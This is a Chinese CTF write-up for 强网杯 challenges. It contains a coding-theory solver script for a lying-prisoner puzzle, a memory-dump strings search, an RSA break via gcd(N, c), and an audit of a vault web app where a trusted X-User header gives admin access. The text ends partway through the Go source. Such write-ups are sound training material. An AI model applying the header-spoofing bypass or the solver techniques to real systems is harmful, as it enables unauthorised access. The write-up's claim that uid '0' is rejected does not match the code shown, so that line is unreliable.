【CTF | 比赛篇】强网杯wp
文章目录
- MISC
- 签到
- The_Interrogation_Room
- Personal Vault
- crypto
- check-little
- web
- SecretVault
- bbjv
MISC
签到
题目内容:
> cat readme.txt
1、严禁与非本队人员以任何形式询问、串通解题思路以及flag,如有发现则按作弊处理。
2、所有参赛选手应妥善保存题目分析过程中的相关记录,以备在存疑时提交。
3、比赛允许使用生成式人工智能辅助解题。若使用AI辅助解题,参赛选手需保留完整的AI对话记录(包括但不限于对话导出、图片、视频等形式),并上传至百度网盘。在提交writeup时,需将链接附在文档开头。如未提交链接或链接失效,则相应赛题按作弊处理。
4、各队提交writeup时需要每个解出题的详细分析思路、步骤截图、所有解题相关的脚本以及最终获取flag的截图(包含flag值,不可模糊处理)。若思路明显错误或缺失、脚本逻辑错误或与其他队伍雷同按作弊处理。
> cat flag
flag{我已阅读参赛须知,并遵守比赛规则。}
flag{我已阅读参赛须知,并遵守比赛规则。}
The_Interrogation_Room
题目内容:
Reminder:
- Complete all rounds to get the flag (or a gift).
- Any invalid token terminates the session.
- Spaces must be added on both sides of ‘(’ and ‘)’.
看附件:
import os
import random
import string
from hashlib import sha256
import socketserver
import secretswhite_list = ['==','(',')','S0','S1','S2','S3','S4','S5','S6','S7','0','1','and','or']
TURNS = 25def interrogate(expr, secrets):tokens = []i = 0while i < len(expr):if expr[i] in '()':tokens.append(expr[i])i += 1elif expr[i].isspace():i += 1elif expr[i] in '01':tokens.append(expr[i] == '1')i += 1else:start = iwhile i < len(expr) and (expr[i].isalnum() or expr[i] == '_' or expr[i] == '='):i += 1word = expr[start:i]if word in ['S0', 'S1', 'S2', 'S3', 'S4', 'S5', 'S6', 'S7']:idx = int(word[1])tokens.append(secrets[idx])elif word in ['True', 'true']:tokens.append(True)elif word in ['False', 'false']:tokens.append(False)elif word == 'and':tokens.append('and')elif word == 'or':tokens.append('or')elif word == 'not':tokens.append('not')elif word == '==':tokens.append('==')else:raise ValueError(f"Invalid token: {word}")def evaluate(tokens):precedence = {'==': 2,'not': 3,'and': 1,'or': 0}output = []ops = []for token in tokens:if token in [True, False]:output.append(token)elif token == '(':ops.append(token)elif token == ')':while ops and ops[-1] != '(':output.append(ops.pop())if ops and ops[-1] == '(':ops.pop()else:raise ValueError("Mismatched parentheses")elif token in ['==', 'not', 'and', 'or']:while (ops and ops[-1] != '(' and precedence.get(ops[-1], -1) >= precedence.get(token, -1)):output.append(ops.pop())ops.append(token)while ops:if ops[-1] == '(':raise ValueError("Mismatched parentheses")output.append(ops.pop())stack = []for token in output:if token in [True, False]:stack.append(token)elif token == 'not':if len(stack) < 1:raise ValueError("Invalid expression: not enough operands for 'not'")a = stack.pop()stack.append(not a)elif token == 'and':if len(stack) < 2:raise ValueError("Invalid expression: not enough operands for 'and'")b = stack.pop()a = stack.pop()stack.append(a and b)elif token == 'or':if len(stack) < 2:raise ValueError("Invalid expression: not enough operands for 'or'")b = stack.pop()a = stack.pop()stack.append(a or b)elif token == '==':if len(stack) < 2:raise ValueError("Invalid expression: not enough operands for '=='")b = stack.pop()a = stack.pop()stack.append(a == b)if len(stack) != 1:raise ValueError(f"Invalid expression: expected 1 result, got {len(stack)}")return stack[0]return evaluate(tokens)class Task(socketserver.BaseRequestHandler):def proof_of_work(self):random.seed(os.urandom(8))proof = ''.join([random.choice(string.ascii_letters + string.digits) for _ in range(20)])_hexdigest = sha256(proof.encode()).hexdigest()self.send(f"sha256(XXXX+{proof[4:]}) == {_hexdigest}".encode())self.send(b'Give me XXXX: ')x = self.recv().encode()if len(x) != 4 or sha256(x + proof[4:].encode()).hexdigest() != _hexdigest:self.send('wrong')return Falsereturn Truedef recv(self):sz = 16384try:r = szres = ""while r > 0:res += self.request.recv(r).decode()if res.endswith("\n"):r = 0else:r = sz - len(res)res = res.strip()except:res = ""return res.strip()def send(self, msg, newline=True):if isinstance(msg, bytes):msg += b'\n'else:msg += '\n'msg = msg.encode()self.request.sendall(msg)def interrogate_prisoner(self, ans, secrets, expr):try:S0, S1, S2, S3, S4, S5, S6, S7 = secretsr = interrogate(expr, secrets)except Exception as e:self.send("The prisoner pretends not to understand your question.\n", e)exit(0)return ans(r)def do_round(self):truth = lambda r: not not rlie = lambda r: not rsecrets = []for i in range(8):secrets.append((True, False)[random.random() > 0.5])self.send("Welcome to the interrogation room! Detective, you are interrogating a cunning prisoner who holds 8 critical secrets.\nSome of these secrets are true intelligence while others are carefully planted disinformation.\nThe prisoner has agreed to answer your questions, but be warned - he will lie exactly twice during this session.\n")prisoner_deception = 2responses = [truth] * (17 - prisoner_deception) + [lie] * prisoner_deceptionrandom.shuffle(responses)for i in range(17):self.send("Ask your question:")question = self.recv()for word in question.split(" "):if word not in white_list:self.send("({}) The prisoner smirks: 'I refuse to answer that questionable phrasing!'".format(word))exit(0)res = str(self.interrogate_prisoner(responses[i], secrets, question))self.send("Prisoner's response: {}!\n".format(res))self.send("Now reveal the true secrets (1 for true, 0 for false):")return secrets == list(map(int, self.recv().split(" ")))def handle(self):if not self.proof_of_work():return 0self.send("Notice: The prisoner is a trained operative and will lie exactly twice in the 17 answers he gives you! Can you still uncover the truth?")for i in range(TURNS):if i == 10:self.send(f'Here is a gift for you: {secrets.Gift()}')if not self.do_round():self.send("The prisoner laughs triumphantly. 'You fell for my deception! Now I walk free while you face disciplinary action.'\n")exit(0)else:self.send("The prisoner scowls as you expose his lies. 'Very well, ask your next round of questions then.'\n")self.send("The prisoner slumps in defeat: 'Alright, you win! I'll tell you everything.' He confesses all his secrets and reveals the hidden location of {}'\nAs he signs the confession, you notice a coded message hidden in his handwriting that leads you to the ultimate prize.".format(secrets.flag))try:fork = socketserver.ForkingTCPServer
except:fork = socketserver.ThreadingTCPServer
class ForkingServer(fork, socketserver.TCPServer):passif __name__ == "__main__":HOST, PORT = '0.0.0.0', 9999server = ForkingServer((HOST, PORT), Task)server.allow_reuse_address = Trueserver.serve_forever()
丢给chat
让chat
写脚本:
#!/usr/bin/env python3
# coding: utf-8
"""
server11_fixed_adaptive.py
合并:生成矩阵编码 + XOR 问题 + PoW + 自适应区分器 + 非阻塞/超时健壮读写
用法:修改 HOST / PORT,然后运行
"""import socket
import itertools
import hashlib
import re
import string
import time
import json# ---------------- CONFIG ----------------
HOST = "47.93.215.3" # <- 改为目标 IP
PORT = 30731 # <- 改为目标端口CHARSET = string.ascii_letters + string.digits
POW_PREFIX_LEN = 4SECRET_BITS = 8
CODEWORD_BITS = 17
MAX_ERRORS = 2
MAX_QUERIES = 17SOCKET_TIMEOUT = 6.0 # socket read timeout(秒),防止长期阻塞
RECV_CHUNK = 4096# ---------------- GENERATOR MATRIX ----------------
GEN_MATRIX = [[0,1,1,0,1,0,0,0,1,1,0,0,0,1,0,1,1],[1,0,1,1,0,1,0,0,0,1,1,0,0,0,1,0,1],[1,1,0,1,1,0,1,0,0,0,1,1,0,0,0,1,0],[0,1,1,0,1,1,0,1,0,0,0,1,1,0,0,0,1],[1,0,1,1,0,1,1,0,1,0,0,0,1,1,0,0,0],[0,1,0,1,1,0,1,1,0,1,0,0,0,1,1,0,0],[0,0,1,0,1,1,0,1,1,0,1,0,0,0,1,1,0],[0,0,0,1,0,1,1,0,1,1,0,1,0,0,0,1,1],
]# ---------------- UTIL: encode / generate questions ----------------
def encode(secret_bits):return tuple(sum(secret_bits[i] * GEN_MATRIX[i][j] for i in range(SECRET_BITS)) % 2 for j in range(CODEWORD_BITS))# build codeword table
CODEWORD_TABLE = {}
for bits in itertools.product([0,1], repeat=SECRET_BITS):cw = encode(bits)CODEWORD_TABLE[cw] = bits# generate XOR-like expressions from columns
def make_xor_expr(indices):if not indices:return "0"if len(indices) == 1:return f"S{indices[0]}"expr = f"( ( S{indices[0]} == S{indices[1]} ) == 0 )"for idx in indices[2:]:expr = f"( ( {expr} == S{idx} ) == 0 )"return exprTRANSPOSED = list(zip(*GEN_MATRIX))
ALL_QUESTIONS = [make_xor_expr([i for i,b in enumerate(col) if b]) for col in TRANSPOSED]# ---------------- Precompute truth masks for ALL_QUESTIONS ----------------
# mask: 256-bit int where bit k is 1 if secret==k makes question True
def build_question_masks(questions):masks = []for q in questions:mask = 0# evaluate q by evaluating XOR parity of active indices (convert expression -> active indices)# We can extract active indices more directly: find all S# occurrencesidxs = sorted({int(x[1:]) for x in re.findall(r"S\d+", q)})# for all secrets:for k in range(256):s = [(k >> i) & 1 for i in range(SECRET_BITS)]# compute parity of selected indices (since our question is XOR combination)if not idxs:val = 0elif len(idxs) == 1:val = s[idxs[0]]else:# compute XOR of the listed indicesxor = 0for ii in idxs:xor ^= s[ii]val = xorif val:mask |= (1 << k)masks.append((q, mask, tuple(idxs)))return masksQUESTION_MASKS = build_question_masks(ALL_QUESTIONS)# ---------------- choose discriminators (bitset greedy) ----------------
def choose_discriminators_bitset(candidates_bits, question_masks, k=MAX_QUERIES):"""candidates_bits: int bitset of candidate secret indices (bits 0..255)question_masks: list of tuples (q, mask, idxs)return: list of question strings"""total = candidates_bits.bit_count()if total <= 1:return []remaining = question_masks.copy()selected = []while len(selected) < k and remaining:best_idx = Nonebest_score = Nonefor i, (q, mask, idxs) in enumerate(remaining):true_count = (candidates_bits & mask).bit_count()false_count = total - true_countscore = max(true_count, false_count) # minimize this# tie-break: prefer closer to balanced (abs difference smaller)diff = abs(true_count - false_count)if best_score is None or (score < best_score[0] or (score == best_score[0] and diff < best_score[1])):best_score = (score, diff)best_idx = iif best_idx is None:breakselected.append(remaining.pop(best_idx))# if perfectly separated to singletons, stop (quick check)# Build patterns for selectedpatterns = {}for k2 in range(256):if ((candidates_bits >> k2) & 1) == 0:continuepat = 0for j, (_, m, _) in enumerate(selected):if ((m >> k2) & 1):pat |= (1 << j)patterns.setdefault(pat, []).append(k2)if len(patterns) == total:break# if no split happened in this step, breakif best_score[0] == total:breakreturn [q for q, _, _ in selected]# ---------------- decode with up to MAX_ERRORS corrections ----------------
def decode_candidates_from_answers(answers, questions):"""answers: list of 0/1 for questions (len can be <= CODEWORD_BITS)questions: list of question strings in same order as answersReturn: list of candidate secrets (tuples)"""# Build masks for asked questions (reuse precomputed)qmask_map = {q: m for q, m, idxs in QUESTION_MASKS}q_masks = []for q in questions:if q not in qmask_map:# fallback (shouldn't happen)idxs = sorted({int(x[1:]) for x in re.findall(r"S\d+", q)})mask = 0for k in range(256):s = [(k >> i) & 1 for i in range(SECRET_BITS)]if not idxs:val = 0elif len(idxs) == 1:val = s[idxs[0]]else:xor = 0for ii in idxs:xor ^= s[ii]val = xorif val:mask |= (1 << k)qmask_map[q] = maskq_masks.append(qmask_map[q])candidates = []# brute-force check all 256 secrets but using early prune when mismatches > MAX_ERRORSfor k in range(256):mismatches = 0for m, a in zip(q_masks, answers):expected = ((m >> k) & 1)if expected != a:mismatches += 1if mismatches > MAX_ERRORS:breakif mismatches <= MAX_ERRORS:candidates.append((k, mismatches, tuple((k >> i) & 1 for i in range(SECRET_BITS))))candidates.sort(key=lambda x: x[1])return candidates# ---------------- networking helpers (robust read) ----------------
def recv_until_any(conn, markers, timeout=SOCKET_TIMEOUT):"""read from conn until any marker substring appears in the accumulated buffer or timeout occurs.returns (buffer_str, matched_marker_or_None)"""conn.settimeout(timeout)buf = b""deadline = time.time() + timeouttry:while time.time() < deadline:try:data = conn.recv(RECV_CHUNK)except socket.timeout:breakif not data:breakbuf += datas = buf.decode(errors='ignore')for mk in markers:if mk in s:return s, mkreturn buf.decode(errors='ignore'), Nonefinally:conn.settimeout(None)def read_line(conn, timeout=SOCKET_TIMEOUT):conn.settimeout(timeout)buf = b""try:while True:ch = conn.recv(1)if not ch:raise ConnectionAbortedError("remote closed")buf += chif buf.endswith(b"\n"):breakreturn buf.decode(errors='ignore').strip()except socket.timeout:raise TimeoutError("read_line timeout")finally:conn.settimeout(None)def send_line(conn, s):conn.sendall((s + "\n").encode())# ---------------- PoW solver (simple) ----------------
def solve_pow_from_intro(intro_line):m = re.search(r"sha256\(XXXX\+([A-Za-z0-9]+)\) == ([0-9a-f]{64})", intro_line.strip())if not m:return Nonesuffix, target = m.groups()print(f"[*] Solving PoW sha256(XXXX+{suffix}) == {target[:12]}...")# single-thread brute force (fast enough usually). If you want, can replace with multiprocessing.for p in itertools.product(CHARSET, repeat=POW_PREFIX_LEN):pre = "".join(p)if hashlib.sha256((pre + suffix).encode()).hexdigest() == target:print(f"[+] PoW solved: {pre}")return prereturn None# ---------------- MAIN RUN ----------------
def run():print(f"[*] Connect to {HOST}:{PORT}")with socket.create_connection((HOST, PORT), timeout=10) as conn:conn.settimeout(None)# read initial lines until PoW or Askintro, mk = recv_until_any(conn, ["sha256(", "Ask your question:", "Give me XXXX:", "Prisoner's response:"], timeout=8)print("[RECV-INTRO]")print(intro.strip().splitlines()[-10:]) # print last few lines# handle PoWif "sha256(" in intro:# extract the pow line (first occurrence)m = re.search(r'.*(sha256\(XXXX\+[A-Za-z0-9]+\) == [0-9a-f]{64}).*', intro, re.S)pow_line = m.group(1) if m else Noneif pow_line:pow_prefix = solve_pow_from_intro(pow_line)if pow_prefix is None:print("[!] PoW unsolved, abort")return# consume until "Give me XXXX:" prompt_, mk2 = recv_until_any(conn, ["Give me XXXX:"], timeout=4)send_line(conn, pow_prefix)else:print("[!] PoW line not parsed properly")returncarry_candidates = Noneturn = 0# main loop: keep running rounds until flag found or connection closedwhile True:turn += 1print(f"\n=== TURN {turn} ===")# Wait for either "Ask your question:" or other control textbuf, mk = recv_until_any(conn, ["Ask your question:", "Very well, ask your next round", "flag", "You fell for", "Now reveal the true secrets"], timeout=12)if "flag" in buf.lower():print("[+] Server returned flag or flag-containing text:")print(buf)return# choose questions for this roundif carry_candidates is None:# use default full question set (first CODEWORD_BITS)questions = [q for q in ALL_QUESTIONS][:MAX_QUERIES]print(f"[*] Using base questions (count={len(questions)})")else:# build bitset of candidate indicesbits_set = 0for k, mm, s in carry_candidates:bits_set |= (1 << k)discrims = choose_discriminators_bitset(bits_set, QUESTION_MASKS, k=MAX_QUERIES)questions = discrims[:MAX_QUERIES]# pad with base if too fewfor q in ALL_QUESTIONS:if len(questions) >= MAX_QUERIES:breakif q not in questions:questions.append(q)print(f"[*] Using adaptive questions (count={len(questions)})")# send questions in sequence, parse prisoner responsesanswers = []for qidx, q in enumerate(questions, start=1):# wait until server asks us to asktry:s, mk = recv_until_any(conn, ["Ask your question:", "Now reveal", "Very well, ask your next round"], timeout=10)except Exception:s, mk = "", None# If server says "Now reveal" or "Very well" before asking, break (proceed to reveal stage)if "Now reveal" in s or "Very well, ask your next round" in s:# stop asking further questions this roundprint("[*] Server moved to reveal/next state before all questions")break# send questionprint(f"[SEND-Q {qidx}/{len(questions)}] {q}")send_line(conn, q)# read prisoner responseresp_buf, mk2 = recv_until_any(conn, ["Prisoner's response:", "Prisoner returned", "Prisoner's response"], timeout=8)# parse boolean from resp_bufm = re.search(r"(True|False|true|false|1|0)", resp_buf)if not m:# fallback: try a single read_linetry:line = read_line(conn, timeout=3)resp_buf += "\n" + lineexcept TimeoutError:passm = re.search(r"(True|False|true|false|1|0)", resp_buf)if not m:val = 0else:token = m.group(1).lower()val = 1 if token in ("true", "1") else 0answers.append(val)print(f"[RECV] answer -> {val}")# small sleep to be polite and avoid racingtime.sleep(0.05)# If we have no answers (server advanced), try to read the line telling us next roundif not answers:tail, mk3 = recv_until_any(conn, ["Very well, ask your next round", "Now reveal the true secrets", "flag", "You fell for"], timeout=6)if "flag" in tail.lower():print("[+] Got flag text:")print(tail)returnprint("[*] No answers collected this iteration, continuing")carry_candidates = Nonecontinue# Now attempt to decode candidates from answers & list of questions askedcandidates = decode_candidates_from_answers(answers, questions)print(f"[+] Decoded candidates count: {len(candidates)} (showing up to 8):")for i, (k, mm, s) in enumerate(candidates[:8]):print(f" cand{i}: idx={k:03d} mismatches={mm} secret={' '.join(str(x) for x in s)}")# If exactly 1 candidate -> reveal itif len(candidates) == 1:k, mm, secret_tuple = candidates[0]secret_str = " ".join(str(x) for x in secret_tuple)# Wait for "Now reveal" prompt (but be robust: if not present, just send)# Try to read a short message to see if server expects revealtail, mk4 = recv_until_any(conn, ["Now reveal", "Give me the secrets", "Very well, ask your next round", "flag"], timeout=4)print(f"[*] Submitting secret: {secret_str}")send_line(conn, secret_str)# read immediate result linesresult_buf, mk5 = recv_until_any(conn, ["fell for my deception", "Very well, ask your next round", "flag", "You fell for"], timeout=6)print("[RECV after submit]")print(result_buf.strip().splitlines()[-6:])if "flag" in result_buf.lower():print("[+] Flag found in server response!")return# if submission failed or server asks next round, continuecarry_candidates = None# short delay before next roundtime.sleep(0.1)continue# no candidates -> fail (shouldn't often happen)if len(candidates) == 0:print("[!] No candidates found: saving answers for debug and aborting.")with open("debug_answers.json", "w") as f:json.dump({"turn": turn, "questions": questions, "answers": answers}, f, indent=2)return# multiple candidates -> set carry and loop to next turn (adaptive stage)carry_candidates = candidates# save candidate filewith open(f"candidates_turn_{turn}.txt", "w") as f:for k, mm, s in candidates:f.write(f"{k:03d} {mm} {' '.join(str(x) for x in s)}\n")print(f"[*] Multiple candidates ({len(candidates)}). Saved candidates_turn_{turn}.txt and will disambiguate next round.")# ---------------- run main ----------------
if __name__ == "__main__":try:run()except KeyboardInterrupt:print("\n[!] Interrupted by user")
flag{296ae6f1-5542-4f84-b0e8-6ac8898d7670}
Personal Vault
题目内容:
My friend created a vault for each process, unfortunately we haven’t contacted for years, and this vault thing crashed my pc when I tried checking other’s secret? Please help me with this
内存取证题目,使用strings
扫描出flag
:
strings -e l MEMORY.DMP | grep flag{
flag{personal_vault_seems_a_little_volatile_innit}
crypto
check-little
题目内容:
e好像很小,是不是有关呢?
题目附件:
# task.py
from Crypto.Util.number import *
from Crypto.Util.Padding import pad
from Crypto.Cipher import AES
import osflag, key = open('secret').read().split('\n')e = 3while 1:p = getPrime(1024)q = getPrime(1024)phi = (p - 1) * (q - 1)if phi % e != 0:break
N = p * q
c = pow(key, e, N)iv = os.urandom(16)
ciphertext = AES.new(key = long_to_bytes(key)[:16], iv = iv, mode = AES.MODE_CBC).encrypt(pad(flag.encode(),16)).hex()f = open('output.txt', 'w')
f.write(f'N = {N}\n')
f.write(f'c = {c}\n')
f.write(f'iv = {iv}\n')
f.write(f'ciphertext = {ciphertext}\n')
# output.txt
N = 18795243691459931102679430418438577487182868999316355192329142792373332586982081116157618183340526639820832594356060100434223256500692328397325525717520080923556460823312550686675855168462443732972471029248411895298194999914208659844399140111591879226279321744653193556611846787451047972910648795242491084639500678558330667893360111323258122486680221135246164012614985963764584815966847653119900209852482555918436454431153882157632072409074334094233788430465032930223125694295658614266389920401471772802803071627375280742728932143483927710162457745102593163282789292008750587642545379046283071314559771249725541879213
c = 10533300439600777643268954021939765793377776034841545127500272060105769355397400380934565940944293911825384343828681859639313880125620499839918040578655561456321389174383085564588456624238888480505180939435564595727140532113029361282409382333574306251485795629774577583957179093609859781367901165327940565735323086825447814974110726030148323680609961403138324646232852291416574755593047121480956947869087939071823527722768175903469966103381291413103667682997447846635505884329254225027757330301667560501132286709888787328511645949099996122044170859558132933579900575094757359623257652088436229324185557055090878651740
iv = b'\x91\x16\x04\xb9\xf0RJ\xdd\xf7}\x8cW\xe7n\x81\x8d'
ciphertext = bf87027bc63e69d3096365703a6d47b559e0364b1605092b6473ecde6babeff2
丢给chat
,可以直接出:
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import math# 从题目给出的 output.txt 里复制这些值
N = int("18795243691459931102679430418438577487182868999316355192329142792373332586982081116157618183340526639820832594356060100434223256500692328397325525717520080923556460823312550686675855168462443732972471029248411895298194999914208659844399140111591879226279321744653193556611846787451047972910648795242491084639500678558330667893360111323258122486680221135246164012614985963764584815966847653119900209852482555918436454431153882157632072409074334094233788430465032930223125694295658614266389920401471772802803071627375280742728932143483927710162457745102593163282789292008750587642545379046283071314559771249725541879213")
c = int("10533300439600777643268954021939765793377776034841545127500272060105769355397400380934565940944293911825384343828681859639313880125620499839918040578655561456321389174383085564588456624238888480505180939435564595727140532113029361282409382333574306251485795629774577583957179093609859781367901165327940565735323086825447814974110726030148323680609961403138324646232852291416574755593047121480956947869087939071823527722768175903469966103381291413103667682997447846635505884329254225027757330301667560501132286709888787328511645949099996122044170859558132933579900575094757359623257652088436229324185557055090878651740")
iv = b'\x91\x16\x04\xb9\xf0RJ\xdd\xf7}\x8cW\xe7n\x81\x8d'
ciphertext = bytes.fromhex("bf87027bc63e69d3096365703a6d47b559e0364b1605092b6473ecde6babeff2")
e = 3# 因式分解(通过 gcd)
p = math.gcd(N, c)
q = N // p
assert p * q == N# 私钥 d
phi = (p - 1) * (q - 1)
d = pow(e, -1, phi)# 恢复 key
key = pow(c, d, N)# long_to_bytes(key)[:16]
key_bytes = key.to_bytes((key.bit_length() + 7) // 8, 'big')[:16]# AES-CBC 解密并去填充
cipher = AES.new(key_bytes, AES.MODE_CBC, iv=iv)
pt_padded = cipher.decrypt(ciphertext)
pt = unpad(pt_padded, 16)
print(pt.decode())
flag{m_m4y_6e_divIS1b1e_by_p?!}
web
SecretVault
题目内容:
小明最近注册了很多网络平台账号,为了让账号使用不同的强密码,小明自己动手实现了一套非常“安全”的密码存储系统 – SecretVault,但是健忘的小明没记住主密码,你能帮他找找吗
首先审计代码,flask
框架:
# app.py
import base64
import os
import secrets
import sys
from datetime import datetime
from functools import wraps
import requestsfrom cryptography.fernet import Fernet
from flask import (Flask,flash,g,jsonify,make_response,redirect,render_template,request,url_for,
)
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.exc import IntegrityError
import hashlibdb = SQLAlchemy()class User(db.Model):id = db.Column(db.Integer, primary_key=True)username = db.Column(db.String(80), unique=True, nullable=False)password_hash = db.Column(db.String(128), nullable=False)salt = db.Column(db.String(64), nullable=False)created_at = db.Column(db.DateTime, default=datetime.utcnow, nullable=False)vault_entries = db.relationship('VaultEntry', backref='user', lazy=True, cascade='all, delete-orphan')class VaultEntry(db.Model):id = db.Column(db.Integer, primary_key=True)user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)label = db.Column(db.String(120), nullable=False)login = db.Column(db.String(120), nullable=False)password_encrypted = db.Column(db.Text, nullable=False)notes = db.Column(db.Text)created_at = db.Column(db.DateTime, default=datetime.utcnow, nullable=False)def hash_password(password: str, salt: bytes) -> str:data = salt + password.encode('utf-8')for _ in range(50):data = hashlib.sha256(data).digest()return base64.b64encode(data).decode('utf-8')def verify_password(password: str, salt_b64: str, digest: str) -> bool:salt = base64.b64decode(salt_b64.encode('utf-8'))return hash_password(password, salt) == digestdef generate_salt() -> bytes:return secrets.token_bytes(16)def create_app() -> Flask:app = Flask(__name__)app.config['SECRET_KEY'] = secrets.token_hex(32)app.config['SQLALCHEMY_DATABASE_URI'] = os.getenv('DATABASE_URL', 'sqlite:///vault.db')app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = Falseapp.config['SIGN_SERVER'] = os.getenv('SIGN_SERVER', 'http://127.0.0.1:4444/sign')fernet_key = os.getenv('FERNET_KEY')if not fernet_key:raise RuntimeError('Missing FERNET_KEY environment variable. Generate one with `python -c "from cryptography.fernet import Fernet; print(Fernet.generate_key().decode())"`.')app.config['FERNET_KEY'] = fernet_keydb.init_app(app)fernet = Fernet(app.config['FERNET_KEY'])with app.app_context():db.create_all()if not User.query.first():salt = secrets.token_bytes(16)password = secrets.token_bytes(32).hex()password_hash = hash_password(password, salt)user = User(id=0,username='admin',password_hash=password_hash,salt=base64.b64encode(salt).decode('utf-8'),)db.session.add(user)db.session.commit()flag = open('./flag').read().strip()flagEntry = VaultEntry(user_id=user.id,label='flag',login='flag',password_encrypted=fernet.encrypt(flag.encode('utf-8')).decode('utf-8'),notes='This is the flag entry.',)db.session.add(flagEntry)db.session.commit()def login_required(view_func):@wraps(view_func)def wrapped(*args, **kwargs):uid = request.headers.get('X-User', '0')print(uid)if uid == 'anonymous':flash('Please sign in first.', 'warning')return redirect(url_for('login'))try:uid_int = int(uid)except (TypeError, ValueError):flash('Invalid session. Please sign in again.', 'warning')return redirect(url_for('login'))user = User.query.filter_by(id=uid_int).first()if not user:flash('User not found. Please sign in again.', 'warning')return redirect(url_for('login'))g.current_user = userreturn view_func(*args, **kwargs)return wrapped@app.route('/')def index():uid = request.headers.get('X-User', '0')if not uid or uid == 'anonymous':return redirect(url_for('login'))return redirect(url_for('dashboard'))@app.route('/register', methods=['GET', 'POST'])def register():if request.method == 'POST':username = request.form.get('username', '').strip()password = request.form.get('password', '')confirm_password = request.form.get('confirm_password', '')if not username or not password:flash('Username and password are required.', 'danger')return render_template('register.html')if password != confirm_password:flash('Passwords do not match.', 'danger')return render_template('register.html')salt = generate_salt()password_hash = hash_password(password, salt)user = User(username=username,password_hash=password_hash,salt=base64.b64encode(salt).decode('utf-8'),)db.session.add(user)try:db.session.commit()except IntegrityError:db.session.rollback()flash('Username already exists. Please choose another.', 'warning')return render_template('register.html')flash('Registration successful. Please sign in.', 'success')return redirect(url_for('login'))return render_template('register.html')@app.route('/login', methods=['GET', 'POST'])def login():if request.method == 'POST':username = request.form.get('username', '').strip()password = request.form.get('password', '')user = User.query.filter_by(username=username).first()if not user or not verify_password(password, user.salt, user.password_hash):flash('Invalid username or password.', 'danger')return render_template('login.html')r = requests.get(app.config['SIGN_SERVER'], params={'uid': user.id}, timeout=5)if r.status_code != 200:flash('Unable to reach the authentication server. Please try again later.', 'danger')return render_template('login.html')token = r.text.strip()response = make_response(redirect(url_for('dashboard')))response.set_cookie('token',token,httponly=True,secure=app.config.get('SESSION_COOKIE_SECURE', False),samesite='Lax',max_age=12 * 3600,)return responsereturn render_template('login.html')@app.route('/logout')def logout():response = make_response(redirect(url_for('login')))response.delete_cookie('token')flash('Signed out.', 'info')return response@app.route('/dashboard')@login_requireddef dashboard():user = g.current_userentries = [{'id': entry.id,'label': entry.label,'login': entry.login,'password': fernet.decrypt(entry.password_encrypted.encode('utf-8')).decode('utf-8'),'notes': entry.notes,'created_at': entry.created_at,}for entry in user.vault_entries]return render_template('dashboard.html', username=user.username, entries=entries)@app.route('/passwords/new', methods=['POST'])@login_requireddef create_password():user = g.current_userlabel = request.form.get('label', '').strip()login_value = request.form.get('login', '').strip()password_plain = request.form.get('password', '').strip()notes = request.form.get('notes', '').strip() or Noneif not label or not login_value or not password_plain:flash('Service name, login, and password are required.', 'danger')return redirect(url_for('dashboard'))encrypted_password = fernet.encrypt(password_plain.encode('utf-8')).decode('utf-8')entry = VaultEntry(user_id=user.id,label=label,login=login_value,password_encrypted=encrypted_password,notes=notes,)db.session.add(entry)db.session.commit()flash('Password entry saved.', 'success')return redirect(url_for('dashboard'))@app.route('/passwords/<int:entry_id>', methods=['DELETE'])@login_requireddef delete_password(entry_id: int):user = g.current_userentry = VaultEntry.query.filter_by(id=entry_id, user_id=user.id).first()if not entry:return jsonify({'success': False, 'message': 'Entry not found'}), 404db.session.delete(entry)db.session.commit()return jsonify({'success': True})return appif __name__ == '__main__':flask_app = create_app()flask_app.run(host='127.0.0.1', port=5000, debug=False)
漏洞点在/dashboard
路由:
@app.route('/dashboard')@login_requireddef dashboard():user = g.current_userentries = [{'id': entry.id,'label': entry.label,'login': entry.login,'password': fernet.decrypt(entry.password_encrypted.encode('utf-8')).decode('utf-8'),'notes': entry.notes,'created_at': entry.created_at,}for entry in user.vault_entries]return render_template('dashboard.html', username=user.username, entries=entries)
还有login_required
函数:
def login_required(view_func):@wraps(view_func)def wrapped(*args, **kwargs):uid = request.headers.get('X-User', '0')print(uid)if uid == 'anonymous':flash('Please sign in first.', 'warning')return redirect(url_for('login'))try:uid_int = int(uid)except (TypeError, ValueError):flash('Invalid session. Please sign in again.', 'warning')return redirect(url_for('login'))user = User.query.filter_by(id=uid_int).first()if not user:flash('User not found. Please sign in again.', 'warning')return redirect(url_for('login'))g.current_user = userreturn view_func(*args, **kwargs)return wrapped
可以看到,这里只对HTTP
的header
头字段X-User
做校验,如果是0
或者anonymous
,则不能通过,如果是其他的,就可以成功登录,继续审计,发现admin
用户的uid
:
def create_app() -> Flask:app = Flask(__name__)app.config['SECRET_KEY'] = secrets.token_hex(32)app.config['SQLALCHEMY_DATABASE_URI'] = os.getenv('DATABASE_URL', 'sqlite:///vault.db')app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = Falseapp.config['SIGN_SERVER'] = os.getenv('SIGN_SERVER', 'http://127.0.0.1:4444/sign')fernet_key = os.getenv('FERNET_KEY')if not fernet_key:raise RuntimeError('Missing FERNET_KEY environment variable. Generate one with `python -c "from cryptography.fernet import Fernet; print(Fernet.generate_key().decode())"`.')app.config['FERNET_KEY'] = fernet_keydb.init_app(app)fernet = Fernet(app.config['FERNET_KEY'])with app.app_context():db.create_all()if not User.query.first():salt = secrets.token_bytes(16)password = secrets.token_bytes(32).hex()password_hash = hash_password(password, salt)user = User(id=0,username='admin',password_hash=password_hash,salt=base64.b64encode(salt).decode('utf-8'),)db.session.add(user)db.session.commit()flag = open('./flag').read().strip()flagEntry = VaultEntry(user_id=user.id,label='flag',login='flag',password_encrypted=fernet.encrypt(flag.encode('utf-8')).decode('utf-8'),notes='This is the flag entry.',)db.session.add(flagEntry)db.session.commit()
这是一个初始化函数,并且flag
在admin
用户的备忘录中,但是在这里直接传入X-User
是不行的,因为程序的身份验证逻辑在mai.go
中:
package mainimport ("crypto/rand""encoding/hex""fmt""log""net/http""net/http/httputil""strings""time""github.com/golang-jwt/jwt/v5""github.com/gorilla/mux"
)var (SecretKey = hex.EncodeToString(RandomBytes(32))
)type AuthClaims struct {jwt.RegisteredClaimsUID string `json:"uid"`
}func RandomBytes(length int) []byte {b := make([]byte, length)if _, err := rand.Read(b); err != nil {return nil}return b
